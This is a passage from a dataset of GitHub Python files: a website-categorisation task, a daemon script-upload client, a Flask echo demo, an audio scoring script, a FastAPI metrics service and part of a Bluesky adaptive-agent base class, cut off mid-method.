csv.reader(csvfile)\n models.Website.objects.all().delete()\n models.WebsiteCategory.objects.all().delete()\n models.WebPage.objects.all().delete()\n i = 0\n for row in reader:\n alexa_rank, url = row\n update_website(alexa_rank, url)\n i += 1\n if i >= WEBSITES_TO_PARSE_COUNT:\n break\n\n\ndef update_website(alexa_rank, url):\n api_url = webshrinker_categories_v3(settings.WEBSHIRNKER_ACCESS_KEY,\n settings.WEBSHRINKER_SECRET_KEY,\n url.encode('utf-8'))\n response = requests.get(api_url)\n if response.status_code != 200:\n return\n data = response.json()\n try:\n category_data = data['data'][0]['categories'][0]\n except IndexError:\n return\n category, _ = models.WebsiteCategory.objects.get_or_create(\n name=category_data['id'],\n defaults={'description': category_data['label']}\n )\n title, meta_description = get_url_meta(url)\n website, _ = models.Website.objects.get_or_create(\n url=url,\n defaults={'title': title,\n 'meta_description': meta_description,\n 
'alexa_rank': alexa_rank,\n                  'category': category}\n    )\n\n\ndef get_url_meta(url):\n    url = 'https://' + url\n    response = requests.get(url)\n    soup = BeautifulSoup(response.text, features='html.parser')\n    title = soup.find('title')\n    description = soup.find('meta', attrs={'name': 'description'})\n    if title is None:\n        title = ''\n    else:\n        title = title.contents[0]\n    if description is None:\n        description = ''\n    else:\n        description = description.get('content')\n    return title, description\n","repo_name":"wieczorek1990/websites","sub_path":"websites/api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5695825807","text":"from typing import Dict, List, Union\nfrom tabulate import tabulate\n\n\nasync def upload_script(self, name, crontab=None, file_name=None, script_contents=None):\n    \"\"\"\n    Uploads a script to the daemon instance.\n\n    :async:\n    :param name: The name the script should be referred to by on the daemon.\n    :param crontab: (Optional) A crontab to run the script on. For help writing a crontab try https://crontab.guru/\n    :param file_name: (Optional) A file name, relative to the current working directory, to upload to the daemon.\n        If not provided, `script_contents` is required. The file must be UTF-8 encoded.\n    :param script_contents: (Optional) An eval-able Python string to send to the daemon as a script. If not provided,\n        `file_name` is required.\n    :return: None; raises an Exception if the daemon reports a failure.\n    \"\"\"\n    if file_name and script_contents:\n        raise Exception(\n            \"MSA API - upload_script - cannot provide file_name and script_contents\"\n        )\n\n    if file_name:\n        with open(file_name, \"rb\") as f:\n            try:\n                script_contents = f.read().decode(\"utf-8\")\n            except UnicodeDecodeError:\n                raise Exception(\n                    \"MSA API - upload_script - failed to decode file, expects utf-8 encoding.\"\n                )\n\n    if crontab is not None:\n        payload = {\"name\": name, \"script_contents\": script_contents, \"crontab\": crontab}\n    else:\n        payload = {\"name\": name, \"script_contents\": script_contents}\n\n    response = await self.client.post(\"/scripting/script\", payload=payload)\n\n    if response.status != \"success\":\n        raise Exception(response.json[\"message\"])\n\n\nasync def list_scripts(self) -> None:\n    \"\"\"\n    Prints scripts that have been uploaded to the daemon.\n\n    :param self:\n    :return:\n    :rtype: None\n    \"\"\"\n\n    response = await self.client.get(\"/scripting/script\")\n\n    if response.status != \"success\":\n        raise Exception(response.json[\"message\"])\n\n    scripts = response.json[\"scripts\"]\n\n    print(tabulate(scripts, tablefmt=\"fancy_grid\", headers=\"keys\"))\n\n\nasync def get_scripts(self) -> List[Dict]:\n    \"\"\"\n    Fetches scripts uploaded to the daemon and returns them as a list of objects\n\n    :param self:\n    :return:\n    \"\"\"\n\n    response = await self.client.get(\"/scripting/script\")\n\n    if response.status != \"success\":\n        raise Exception(response.json[\"message\"])\n\n    scripts = response.json[\"scripts\"]\n    return scripts\n\n\nasync def get_script(self, name: str) -> Union[Dict, None]:\n    \"\"\"\n    Fetches a single script uploaded to the daemon and returns it as an object\n\n    :param self:\n    :param name: The name of the script to fetch.\n    :type name: :class:`str`\n    :return: The script and metadata associated with the requested script. 
None if the script was not found.\n :rtype: :class:`Dict` or :class:`NoneType`\n \"\"\"\n\n response = await self.client.get(f\"/scripting/script/{name}\")\n\n if response.status != \"success\":\n raise Exception(response.json[\"message\"])\n\n return response.json[\"script\"]\n\n\nasync def print_script(self, name: str) -> Union[Dict, None]:\n \"\"\"\n Fetches a script uploaded to the daemon and prints its details.\n\n :param self:\n :param name: The name of the script to fetch.\n :type name: :class:`str`\n :rtype: :class:`NoneType`\n \"\"\"\n\n response = await self.client.get(f\"/scripting/script/{name}\")\n\n if response.status != \"success\":\n raise Exception(response.json[\"message\"])\n\n script = response.json[\"script\"]\n\n script = [\n [\"Id\", script[\"id\"]],\n [\"Name \", script[\"name\"]],\n [\"Created\", script[\"created\"]],\n [\"Last Edited\", script[\"last_edited\"]],\n [\"Last Run\", script[\"last_run\"]],\n [\"Currently Running\", \"Yes\" if script[\"running\"] else \"No\"],\n [\"Crontab\", script[\"crontab\"]],\n [\n \"Scheduled For\",\n script[\"scheduled_for\"] if script[\"scheduled_for\"] else \"N/A\",\n ],\n [\"Content\", script[\"content\"]],\n ]\n\n print(tabulate(script, tablefmt=\"fancy_grid\"))\n\n\nasync def delete_script(self, name: str) -> Union[Dict, None]:\n \"\"\"\n Deletes a script uploaded to the daemon, stopping it if it was running, and cancelling it if it was scheduled\n to run.\n\n :param self:\n :param name: The name of the script to delete.\n :type name: :class:`str`\n :return:\n :rtype: None\n \"\"\"\n\n response = await self.client.delete(f\"/scripting/script/{name}\")\n\n if response.status != \"success\":\n raise Exception(response.json[\"message\"])\n\n data = response.json\n\n if data[\"status\"] == \"failure\":\n raise Exception(data[\"reason\"])\n\n return\n\n\ndef register_endpoints(api_binder):\n api_binder.register_method()(upload_script)\n api_binder.register_method()(list_scripts)\n api_binder.register_method()(get_scripts)\n api_binder.register_method()(get_script)\n api_binder.register_method()(print_script)\n api_binder.register_method()(delete_script)\n","repo_name":"MichaelGrabinski/moe-serifu-agent","sub_path":"python/msa/builtins/scripting/client_api.py","file_name":"client_api.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"7589545367","text":"\"\"\"\nMinimal Flask + forms demo\n\nSend HTML page that echoes message from HTTP request\nTo get started, point browser at echo_flask.html\n\"\"\"\n\nfrom flask import Flask, request\n\n# no need for template here - just a constant string\nform_page = \"\"\"\nEcho request\n\n\n\nMessage: \n\n\n\n\n\"\"\"\n\n# No need for message page\n# Flask converts view function return string to HTML page\n\napp = Flask(__name__)\n\napp.debug = True # development only - remove on production machines\n\n# View functions generate HTTP responses including HTML pages and headers\n\n@app.route('/echo_flask.html')\ndef form():\n return form_page\n\n@app.route('/echo_flask.py')\ndef message_page():\n # Flask Quickstart suggests request.form should work, but here it is empty\n # Flask converts return string to HTML page\n return 'Message: %s' % request.args['message']\n\n# No function needed for other routes - Flask will send 404 page\n\nif __name__ == '__main__':\n 
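# A minimal usage sketch (assumption, not part of the original file): Flask's\n    # app.run() also accepts host/port overrides, e.g.\n    # app.run(host=\"0.0.0.0\", port=5000) to accept connections from other\n    # machines during development.\n    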
app.run()\n\n","repo_name":"AbdulAbulbulAmir/uw_python","sub_path":"week7/echo_flask.py","file_name":"echo_flask.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"7340655801","text":"from scipy.io import wavfile\nfrom scipy.stats import pearsonr\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sys import argv\nfrom pathlib import Path\nfrom features import features\n\ndef scores(samples1, freq1, samples2, freq2, samples3, freq3, q1=None, q2=None, return_score=False):\n\n    sentence = features(samples1, freq1).transpose()\n    query1 = features(samples2, freq2).transpose()\n    query2 = features(samples3, freq3).transpose()\n\n    score_list1 = []\n    for pp in range(0, sentence.shape[0]-query1.shape[0], 5):\n        score = 0\n        for n in range(query1.shape[0]):\n            score += pearsonr(query1[n], sentence[pp+n])[0]\n        score_list1.append(score/query1.shape[0])\n\n    score_list2 = []\n    for pp in range(0, sentence.shape[0]-query2.shape[0], 5):\n        score = 0\n        for n in range(query2.shape[0]):\n            score += pearsonr(query2[n], sentence[pp+n])[0]\n        score_list2.append(score/query2.shape[0])\n\n    #print(len(score_list1), '\\t', len(score_list2))\n\n    t1 = np.arange(len(score_list1))/100*5\n    t2 = np.arange(len(score_list2))/100*5\n\n    fig = plt.figure(figsize=(8,2))\n    plt.plot(t1, score_list1, t2, score_list2)\n    if q1 is not None and q2 is not None:\n        plt.legend([q1, q2])\n    else:\n        plt.legend(['query1', 'query2'])\n    plt.gca().set_xlabel('t')\n    plt.gca().set_ylabel('scores')\n    plt.gca().set_xlim(left=0)\n    plt.gca().set_ylim(bottom=0)\n    plt.tight_layout()\n    if __name__ == '__main__':\n        plt.savefig(path1.stem + '_score.pdf')\n    elif return_score:\n        return score_list1, score_list2\n    else:\n        return fig\n\nif __name__ == '__main__':\n    path1 = Path(argv[1])\n\n    try:\n        path2 = Path(argv[2])\n        path3 = Path(argv[3])\n\n    except IndexError:\n        path2 = Path('queries/q1.wav')\n        path3 = Path('queries/q2.wav')\n\n    freq1, samples1 = wavfile.read(path1)\n    freq2, samples2 = wavfile.read(path2)\n    freq3, samples3 = wavfile.read(path3)\n    # normalization\n    samples1 = samples1 / 2**15\n    samples2 = samples2 / 2**15\n    samples3 = samples3 / 2**15\n\n    scores(samples1, freq1, samples2, freq2, samples3, freq3)\n","repo_name":"adokitkat/vut-fit-iss","sub_path":"src/scores.py","file_name":"scores.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29733768031","text":"import logging\nfrom typing import List, Optional\nfrom fastapi import Depends, FastAPI, HTTPException, Request, Response\nfrom pydantic.errors import PydanticValueError\nfrom pydantic.utils import import_string\nfrom sqlalchemy.orm import Session\nfrom app import crud, models, schemas\nfrom app.database import SessionLocal, engine\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom app.utils import get_logger\n\nlogger = get_logger(__name__)\n\n\nmodels.Base.metadata.create_all(bind=engine)\n\napp = FastAPI(title=\"User Data Metric(s) collector\", description=\"collects data for various metrics related to user\")\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=[\"*\"],\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n\n\n@app.middleware(\"http\")\nasync def db_session_middleware(request: Request, call_next):\n    response = Response(\"Internal server error\", status_code=500)\n    try:\n        request.state.db = SessionLocal()\n        response = await call_next(request)\n    
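# One SQLAlchemy session is opened per request; the finally block below\n    # guarantees it is closed even when the downstream handler raises.\n    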
finally:\n        request.state.db.close()\n    return response\n\n\n# Dependency\ndef get_db(request: Request):\n    return request.state.db\n\n@app.get(\"/health\")\ndef health():\n    logger.info({\"message\": \"ok!\"})\n    return {\"message\": \"ok!\"}\n\n@app.post(\"/users/\", response_model=schemas.User)\ndef create_user(user: schemas.UserCreate, db: Session = Depends(get_db)) -> Optional[models.User]:\n    db_user = crud.get_user_by_email(db, email=user.email)\n    if db_user:\n        raise HTTPException(status_code=400, detail=\"Email already registered\")\n    return crud.create_user(db=db, user=user)\n\n\n@app.get(\"/users/\", response_model=List[schemas.User])\ndef read_users(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)) -> Optional[List[models.User]]:\n    users = crud.get_users(db, skip=skip, limit=limit)\n    return users\n\n\n@app.get(\"/users/{user_id}\", response_model=schemas.User)\ndef read_user(user_id: int, db: Session = Depends(get_db)) -> Optional[models.User]:\n    db_user = crud.get_user(db, user_id=user_id)\n    if db_user is None:\n        raise HTTPException(status_code=404, detail=\"User not found\")\n    return db_user\n\n@app.post(\"/users/metrics/\", response_model=schemas.MetricCreate)\ndef create_metric_for_user(\n    metric: schemas.MetricCreate, db: Session = Depends(get_db)\n) -> Optional[models.Metric]:\n    return crud.create_user_metric(db=db, metric=metric)\n\n@app.get(\"/metrics/\", response_model=List[schemas.Metric])\ndef read_metrics(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)) -> Optional[List[models.Metric]]:\n    metrics = crud.get_metrics(db, skip=skip, limit=limit)\n    return metrics\n\n@app.get(\"/tags/\", response_model=List[schemas.Tag])\ndef get_tags(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)) -> Optional[List[models.Tag]]:\n    tags = crud.get_tags(db, skip=skip, limit=limit)\n    return tags\n\n@app.get(\"/tags/{tag_id}\", response_model=schemas.Tag)\ndef get_tag(tag_id: int, db: Session = Depends(get_db)) -> Optional[models.Tag]:\n    db_tag = crud.get_tag(db, tag_id=tag_id)\n    if db_tag is None:\n        raise HTTPException(status_code=404, detail=\"Tag not found\")\n    return db_tag\n\n@app.post(\"/tags/\", response_model=schemas.Tag)\ndef create_tag(tag: schemas.TagCreate, db: Session = Depends(get_db)) -> Optional[models.Tag]:\n    db_tag = crud.get_tag_by_display_name(db, display_name=tag.display_name)\n    if db_tag:\n        raise HTTPException(status_code=400, detail=\"Tag already registered\")\n    return crud.add_tag(db=db, tag=tag)\n\n@app.get(\"/metric_types/\", response_model=List[schemas.MetricType])\ndef get_metric_types(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)) -> Optional[List[models.MetricType]]:\n    metric_types = crud.get_metric_types(db, skip=skip, limit=limit)\n    return metric_types\n\n@app.get(\"/metric_types/{metric_type_id}\", response_model=schemas.MetricType)\ndef get_metric_type(metric_type_id: int, db: Session = Depends(get_db)) -> Optional[models.MetricType]:\n    metric_type = crud.get_metric_type(db, metric_type_id=metric_type_id)\n    if metric_type is None:\n        raise HTTPException(status_code=404, detail=\"Metric type not found\")\n    return metric_type\n\n@app.post(\"/metric_types/\", response_model=schemas.MetricType)\ndef create_metric_type(metric: schemas.MetricTypeCreate, db: Session = Depends(get_db)) -> Optional[models.MetricType]:\n    db_metric_type = crud.get_metric_type_by_type_name(db, type_name=metric.type_name)\n    if db_metric_type:\n        raise HTTPException(status_code=400, detail=\"Metric Type already registered\")\n    return 
crud.add_metric_type(db=db, metric_type=metric)\n","repo_name":"theRuthless/mini_assignment_hashedin","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6755637230","text":"import copy\nimport inspect\nimport sys\nimport threading\nimport time as ttime\nimport uuid\nfrom abc import ABC, abstractmethod\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter\nfrom logging import getLogger\nfrom typing import Callable, Dict, Iterable, List, Literal, Optional, Sequence, Tuple, TypedDict, Union\n\nimport msgpack\nimport numpy as np\nimport tiled\nfrom bluesky_kafka import Publisher, RemoteDispatcher\nfrom bluesky_queueserver_api import BPlan\nfrom bluesky_queueserver_api.api_threads import API_Threads_Mixin\nfrom databroker.client import BlueskyRun\nfrom event_model import compose_run\nfrom numpy.typing import ArrayLike\nfrom xkcdpass import xkcd_password as xp\n\nfrom ..adjudicators.msg import DEFAULT_NAME as ADJUDICATOR_STREAM_NAME\nfrom ..adjudicators.msg import AdjudicatorMsg, Suggestion\nfrom ..server import register_variable, start_task\n\nlogger = getLogger(\"bluesky_adaptive.agents\")\nPASSWORD_LIST = xp.generate_wordlist(wordfile=xp.locate_wordfile(), min_length=3, max_length=6)\n\n\nclass AgentConsumer(RemoteDispatcher):\n def __init__(\n self,\n *,\n topics,\n bootstrap_servers,\n group_id,\n agent=None,\n consumer_config=None,\n polling_duration=0.05,\n deserializer=msgpack.loads,\n ):\n \"\"\"Dispatch documents from Kafka to bluesky callbacks, modified for agent usage.\n This allows subscribing the dispatcher to an on-stop protocol for agents to be told about\n new Bluesky runs. It also provides an interface to trigger changes to the agent using the same\n Kafka topics.\n\n Parameters\n ----------\n topics : list\n List of topics as strings such as [\"topic-1\", \"topic-2\"]\n bootstrap_servers : str\n Comma-delimited list of Kafka server addresses as a string such as ``'127.0.0.1:9092'``\n group_id : str\n Required string identifier for Kafka Consumer group\n agent : Agent\n Instance of the agent to send directives to. Must be set to send directives.\n consumer_config : dict\n Override default configuration or specify additional configuration\n options to confluent_kafka.Consumer.\n polling_duration : float\n Time in seconds to wait for a message before running function work_while_waiting.\n Default is 0.05.\n deserializer : function, optional\n optional function to deserialize data. 
Default is msgpack.loads.\n        \"\"\"\n        super().__init__(topics, bootstrap_servers, group_id, consumer_config, polling_duration, deserializer)\n        self._agent = agent\n\n    def _agent_action(self, topic, doc):\n        \"\"\"Exposes agent methods via the kafka topic.\n        This allows bluesky plans, or adjudicators, to interface with agent hyperparameters or settings.\n\n        Parameters\n        ----------\n        topic : str\n            the Kafka topic of the message containing name and doc\n        doc : dict\n            agent document expecting\n            {\n            'action': 'method_name',\n            'args': [arg1,arg2,...],\n            'kwargs': {kwarg1:val1, kwarg2:val2}\n            }\n\n        Returns\n        -------\n        continue_polling : bool\n        \"\"\"\n        action = doc[\"action\"]\n        args = doc[\"args\"]\n        kwargs = doc[\"kwargs\"]\n        try:\n            getattr(self._agent, action)(*args, **kwargs)\n        except AttributeError as e:\n            logger.error(\n                f\"Unavailable action sent to agent {self._agent.instance_name} on topic: {topic}\\n\" f\"{e}\"\n            )\n        except TypeError as e:\n            logger.error(\n                f\"Type error for {action} sent to agent {self._agent.instance_name} on topic: {topic}\\n\"\n                f\"Are you sure your args and kwargs were appropriate?\\n\"\n                f\"Args received: {args}\\n\"\n                f\"Kwargs received: {kwargs}\\n\"\n                f\"Expected signature: {inspect.signature(getattr(self._agent, action))}\\n\"\n                f\"{e}\"\n            )\n        return True\n\n    def process_document(self, consumer, topic, name, doc):\n        \"\"\"\n        Processes bluesky documents. Documents addressed to this agent by name\n        are routed to ``_agent_action``; all other documents are passed through\n        to RemoteDispatcher.process_document.\n        If this method returns False the consumer will break out of the\n        polling loop.\n\n        Parameters\n        ----------\n        topic : str\n            the Kafka topic of the message containing name and doc\n        name : str\n            bluesky document name: `start`, `descriptor`, `event`, etc.\n        doc : dict\n            bluesky document\n\n        Returns\n        -------\n        continue_polling : bool\n            return False to break out of the polling loop, return True to continue polling\n        \"\"\"\n        if name == self._agent.instance_name:\n            return self._agent_action(topic, doc)\n        else:\n            return super().process_document(consumer, topic, name, doc)\n\n    def set_agent(self, agent):\n        self._agent = agent\n\n\nclass DataKeys(TypedDict):\n    dtype: str\n    dtype_str: str\n    dtype_descr: list\n    shape: list\n\n\ndef infer_data_keys(doc: dict) -> DataKeys:\n    data_keys = dict()\n    _bad_iterables = (str, bytes, dict)\n    _type_map = {\n        \"number\": (float, np.floating, complex),\n        \"array\": (np.ndarray, list, tuple),\n        \"string\": (str,),\n        \"integer\": (int, np.integer),\n    }\n    for key, val in doc.items():\n        if isinstance(val, Iterable) and not isinstance(val, _bad_iterables):\n            dtype = \"array\"\n        else:\n            for json_type, py_types in _type_map.items():\n                if isinstance(val, py_types):\n                    dtype = json_type\n                    break\n            else:\n                raise TypeError(f\"Cannot infer dtype for key {key!r} of type {type(val)}\")\n        arr_val = np.asanyarray(val)\n        arr_dtype = arr_val.dtype\n        data_keys[key] = dict(\n            dtype=dtype,\n            dtype_str=arr_dtype.str,\n            dtype_descr=arr_dtype.descr,\n            shape=list(arr_val.shape),\n            source=\"agent\",\n        )\n    return data_keys\n\n\nclass Agent(ABC):\n    \"\"\"Abstract base class for a single plan agent. These agents should consume data, decide where to measure next,\n    and execute a single type of plan (something akin to move and count).\n    Alternatively, these agents can be used solely for reporting.\n\n    Base agent sets up a kafka subscription to listen to new stop documents, a catalog to read for experiments,\n    a catalog to write agent status to, a kafka publisher to write agent documents to,\n    and a manager API for the queue-server. 
Each time a stop document is read,\n    the respective BlueskyRun is unpacked by the ``unpack_run`` method into an independent and dependent variable,\n    and told to the agent by the ``tell`` method.\n\n    Children of Agent should implement the following, through direct inheritance or mixin classes:\n    Experiment specific:\n\n    - measurement_plan\n    - unpack_run\n    Agent specific:\n\n    - tell\n    - ask\n    - report (optional)\n    - name (optional)\n\n    Parameters\n    ----------\n    kafka_consumer : AgentConsumer\n        Consumer (subscriber) of Kafka Bluesky documents. It should be subscribed to the sources of\n        Bluesky stop documents that will trigger ``tell``.\n        AgentConsumer is a child class of bluesky_kafka.RemoteDispatcher that enables\n        kafka messages to trigger agent directives.\n    kafka_producer : Optional[Publisher]\n        Bluesky Kafka publisher to produce document stream of agent actions for optional Adjudicator.\n    tiled_data_node : tiled.client.node.Node\n        Tiled node to serve as source of data (BlueskyRuns) for the agent.\n    tiled_agent_node : tiled.client.node.Node\n        Tiled node to serve as storage for the agent documents.\n    qserver : bluesky_queueserver_api.api_threads.API_Threads_Mixin\n        Object to manage communication with Queue Server\n    agent_run_suffix : Optional[str], optional\n        Agent name suffix for the instance, by default generated using two hyphen-separated words from xkcdpass.\n    metadata : Optional[dict], optional\n        Optional extra metadata to add to agent start document, by default {}\n    ask_on_tell : bool, optional\n        Whether to ask for new points every time an agent is told about new data.\n        To create a truly passive agent, it is best to implement an ``ask`` as a method that does nothing.\n        To create an agent that only suggests new points periodically or on another trigger, ``ask_on_tell``\n        should be set to False.\n        By default True.\n        Can be adjusted using ``enable_continuous_suggesting`` and ``disable_continuous_suggesting``.\n    direct_to_queue : Optional[bool], optional\n        Whether the agent suggestions will be placed directly on the queue. If false,\n        the suggestions will be sent to a Kafka topic for an Adjudicator to process.\n        By default True.\n        Can be adjusted using ``enable_direct_to_queue`` and ``disable_direct_to_queue``.\n    report_on_tell : bool, optional\n        Whether to create a report every time an agent is told about new data.\n        By default False.\n        Can be adjusted using ``enable_continuous_reporting`` and ``disable_continuous_reporting``.\n    default_report_kwargs : Optional[dict], optional\n        Default kwargs for calling the ``report`` method, by default None\n    queue_add_position : Optional[Union[int, Literal["front", "back"]]], optional\n        Starting position to add to the queue if adding directly to the queue, by default \"back\".\n    endstation_key : Optional[str]\n        Optional string that is needed for Adjudicator functionality. This keys the qserver API instance to\n        a particular endstation. 
This way child Agents can maintain multiple queues for different unit operations.\n For example, this could be a beamline three letter acronym or other distinct key.\n \"\"\"\n\n def __init__(\n self,\n *,\n kafka_consumer: AgentConsumer,\n tiled_data_node: tiled.client.node.Node,\n tiled_agent_node: tiled.client.node.Node,\n qserver: API_Threads_Mixin,\n kafka_producer: Optional[Publisher],\n agent_run_suffix: Optional[str] = None,\n metadata: Optional[dict] = None,\n ask_on_tell: Optional[bool] = True,\n direct_to_queue: Optional[bool] = True,\n report_on_tell: Optional[bool] = False,\n default_report_kwargs: Optional[dict] = None,\n queue_add_position: Optional[Union[int, Literal[\"front\", \"back\"]]] = None,\n endstation_key: Optional[str] = \"\",\n ):\n logger.debug(\"Initializing agent.\")\n self.kafka_consumer = kafka_consumer\n self.kafka_consumer.set_agent(self)\n self.kafka_consumer.subscribe(self._on_stop_router)\n\n self.kafka_producer = kafka_producer\n logger.debug(\"Kafka set up successfully.\")\n\n self.exp_catalog = tiled_data_node\n logger.info(f\"Reading data from catalog: {self.exp_catalog}\")\n\n self.agent_catalog = tiled_agent_node\n logger.info(f\"Writing data to catalog: {self.agent_catalog}\")\n\n self.metadata = metadata or {}\n self.instance_name = (\n f\"{self.name}-{agent_run_suffix}\"\n if agent_run_suffix\n else f\"{self.name}-{xp.generate_xkcdpassword(PASSWORD_LIST, numwords=2, delimiter='-')}\"\n )\n self.metadata[\"agent_name\"] = self.instance_name\n\n self._ask_on_tell = ask_on_tell\n self._report_on_tell = report_on_tell\n self.default_report_kwargs = {} if default_report_kwargs is None else default_report_kwargs\n\n self._compose_run_bundle = None\n self._compose_descriptor_bundles = dict()\n self.re_manager = qserver\n self.endstation_key = endstation_key\n self._queue_add_position = \"back\" if queue_add_position is None else queue_add_position\n self._direct_to_queue = direct_to_queue\n self.default_plan_md = dict(agent_name=self.instance_name, agent_class=str(type(self)))\n self.tell_cache = list()\n try:\n self.server_registrations()\n except RuntimeError as e:\n logger.warning(f\"Agent server unable to make registrations. 
Continuing regardless of\\n {e}\")\n self._kafka_thread = None\n\n @abstractmethod\n def measurement_plan(self, point: ArrayLike) -> Tuple[str, List, dict]:\n \"\"\"Fetch the string name of a registered plan, as well as the positional and keyword\n arguments to pass that plan.\n\n Args/Kwargs is a common place to transform relative into absolute motor coords, or\n other device specific parameters.\n\n Parameters\n ----------\n point : ArrayLike\n Next point to measure using a given plan\n\n Returns\n -------\n plan_name : str\n plan_args : List\n List of arguments to pass to plan from a point to measure.\n plan_kwargs : dict\n Dictionary of keyword arguments to pass the plan, from a point to measure.\n \"\"\"\n ...\n\n @staticmethod\n @abstractmethod\n def unpack_run(run: BlueskyRun) -> Tuple[Union[float, ArrayLike], Union[float, ArrayLike]]:\n \"\"\"\n Consume a Bluesky run from tiled and emit the relevant x and y for the agent.\n\n Parameters\n ----------\n run : BlueskyRun\n\n Returns\n -------\n independent_var :\n The independent variable of the measurement\n dependent_var :\n The measured data, processed for relevance\n \"\"\"\n ...\n\n @abstractmethod\n def tell(self, x, y) -> Dict[str, ArrayLike]:\n \"\"\"\n Tell the agent about some new data\n Parameters\n ----------\n x :\n Independent variable for data observed\n y :\n Dependent variable for data observed\n\n Returns\n -------\n dict\n Dictionary to be unpacked or added to a document\n\n \"\"\"\n ...\n\n @abstractmethod\n def ask(self, batch_size: int) -> Tuple[Sequence[Dict[str, ArrayLike]], Sequence[ArrayLike]]:\n \"\"\"\n Ask the agent for a new batch of points to measure.\n\n Parameters\n ----------\n batch_size : int\n Number of new points to measure\n\n Returns\n -------\n docs : Sequence[dict]\n Documents of key metadata from the ask approach for each point in next_points.\n Must be length of batch size.\n next_points : Sequence\n Sequence of independent variables of length batch size\n \"\"\"\n ...\n\n def report(self, **kwargs) -> Dict[str, ArrayLike]:\n \"\"\"\n Create a report given the data observed by the agent.\n This could be potentially implemented in the base class to write document stream.\n Additional functionality for converting the report dict into an image or formatted report is\n the duty of the child class.\n \"\"\"\n\n raise NotImplementedError\n\n def tell_many(self, xs, ys) -> Sequence[Dict[str, List]]:\n \"\"\"\n Tell the agent about some new data. It is likely that there is a more efficient approach to\n handling multiple observations for an agent. 
The default behavior is to iterate over all\n observations and call the ``tell`` method.\n\n Parameters\n ----------\n xs : list, array\n Array of independent variables for observations\n ys : list, array\n Array of dependent variables for observations\n\n Returns\n -------\n list_of_dict\n\n \"\"\"\n tell_emits = []\n for x, y in zip(xs, ys):\n tell_emits.append(self.tell(x, y))\n return tell_emits\n\n @property\n def queue_add_position(self) -> Union[int, Literal[\"front\", \"back\"]]:\n return self._queue_add_position\n\n @queue_add_position.setter\n def queue_add_position(self, position: Union[int, Literal[\"front\", \"back\"]]):\n self._queue_add_position = position\n\n def update_priority(self, position: Union[int, Literal[\"front\", \"back\"]]):\n \"\"\"Convenience method to update the priority of a direct to queue agent\n\n Parameters\n ----------\n position : Union[int, Literal["front", "back"]]\n Position in priority for queue.\n \"\"\"\n self.queue_add_position = position\n\n @property\n def ask_on_tell(self) -> bool:\n return self._ask_on_tell\n\n @ask_on_tell.setter\n def ask_on_tell(self, flag: bool):\n self._ask_on_tell = flag\n\n @property\n def report_on_tell(self) -> bool:\n return self._report_on_tell\n\n @report_on_tell.setter\n def report_on_tell(self, flag: bool):\n self._report_on_tell = flag\n\n def enable_continuous_reporting(self):\n \"\"\"Enable agent to report each time it receives data.\"\"\"\n self.report_on_tell = True\n\n def disable_continuous_reporting(self):\n \"\"\"Disable agent to report each time it receives data.\"\"\"\n self.report_on_tell = False\n\n def enable_continuous_suggesting(self):\n \"\"\"Enable agent to suggest new points to the queue each time it receives data.\"\"\"\n self.ask_on_tell = True\n\n def disable_continuous_suggesting(self):\n \"\"\"Disable agent to suggest new points to the queue each time it receives data.\"\"\"\n self.ask_on_tell = False\n\n def enable_direct_to_queue(self):\n self._direct_to_queue = True\n\n def disable_direct_to_queue(self):\n self._direct_to_queue = False\n\n @property\n def name(self) -> str:\n \"\"\"Short string name\"\"\"\n return \"agent\"\n\n @classmethod\n def build_from_argparse(cls, parser: ArgumentParser, **kwargs):\n args = parser.parse_args()\n _kwargs = vars(args)\n _kwargs.update(kwargs)\n return cls.__init__(**_kwargs)\n\n @classmethod\n def constructor_argparser(cls) -> ArgumentParser:\n \"\"\"Convenience method to put all arguments into a parser\"\"\"\n parser = ArgumentParser(description=cls.__doc__, formatter_class=RawDescriptionHelpFormatter)\n parser.add_argument(\"--kafka-group-id\", required=True)\n parser.add_argument(\"--kafka-bootstrap-servers\", required=True)\n parser.add_argument(\"--kafka-consumer-config\", required=True)\n parser.add_argument(\"--kafka-producer-config\", required=True)\n parser.add_argument(\"--publisher-topic\", required=True)\n parser.add_argument(\"--subscription-topics\", required=True)\n parser.add_argument(\"--data-profile-name\", required=True)\n parser.add_argument(\"--agent-profile-name\", required=True)\n parser.add_argument(\"--qserver-host\", required=True)\n parser.add_argument(\"--qserver-api-key\", required=True)\n parser.add_argument(\"--metadata\")\n\n return parser\n\n def _write_event(self, stream, doc, uid=None):\n \"\"\"Add event to builder as event page, and publish to catalog\"\"\"\n if not doc:\n logger.info(f\"No doc presented to write_event for stream {stream}\")\n return\n if stream not in self._compose_descriptor_bundles:\n 
